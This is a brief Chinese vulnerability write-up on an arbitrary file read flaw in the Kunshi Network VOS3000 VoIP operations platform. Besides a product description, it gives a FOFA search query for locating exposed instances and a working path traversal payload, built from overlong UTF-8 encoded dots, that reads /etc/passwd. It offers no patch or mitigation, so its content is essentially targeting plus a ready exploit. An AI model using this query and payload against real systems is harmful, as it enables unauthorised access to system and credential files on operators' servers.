昆石网络VOS3000任意文件读取漏洞
一、漏洞简介
昆石网络VOS3000是一款功能全面、性能稳定的VoIP运营支撑系统,适用于各类 电信级 运营业务,尤其适合中小规模VoIP运营业务的需求。无论是在云服务器还是物理机上,它都能完美运行,为运营商提供高效、稳定、可靠的电信级运营服务。昆石网络VOS3000任意文件读取,攻击者可通过此漏洞获取敏感信息。
二、影响版本
- 昆石网络VOS3000
三、资产测绘
- fofa
body="VOS3000, VoIP, VoIP运营支撑系统, 软交换" - 特征
四、漏洞复现
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd